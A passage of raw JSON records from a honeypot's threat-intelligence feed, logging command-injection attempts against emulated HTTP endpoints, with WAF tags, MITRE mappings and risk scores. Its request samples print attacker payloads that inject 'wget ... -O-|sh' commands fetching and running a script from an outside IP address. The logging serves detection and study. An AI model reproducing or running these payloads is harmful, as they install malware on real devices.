\u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":279},{"id":11809378,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":54724,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/tunnel\/tailscale-install","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002271635acf52f08ec22ba63b1a86f3789b430e80ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 316, \u0022payload_entropy\u0022: 5.183904082136518, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d312eaffb1219b22f67c3f3c4a44fb34c986adb9\u0022, \u0022event_fingerprint\u0022: \u0022f49e4131ee1b2f94d1b4d067b217ae331179ce46\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221c88aaeb05f15c8b1d5c079f9002bb30\u0022, \u0022path_pattern_hash\u0022: \u002299cd8034277f5314e823702dbb3ebc6d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00220a9dc941add45b8390eb3a82bfc16661563fa406\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":316},{"id":11809379,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":54736,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/network\/settings","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00223f75be5a16a5bdf34f0b9aa0d9023c8d52bbfb9a\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 315, \u0022payload_entropy\u0022: 5.136654687708576, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d312eaffb1219b22f67c3f3c4a44fb34c986adb9\u0022, \u0022event_fingerprint\u0022: \u0022324ddc33dd62ac1c95c03c4f2e3785430c72030e\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c434b31b75785714d3781e0691d39f21\u0022, \u0022path_pattern_hash\u0022: \u00222b198f042c4b9cbc886c5fadc737cd96\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022f6d3d45417a4327b055ca81e4985c4917041db46\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, 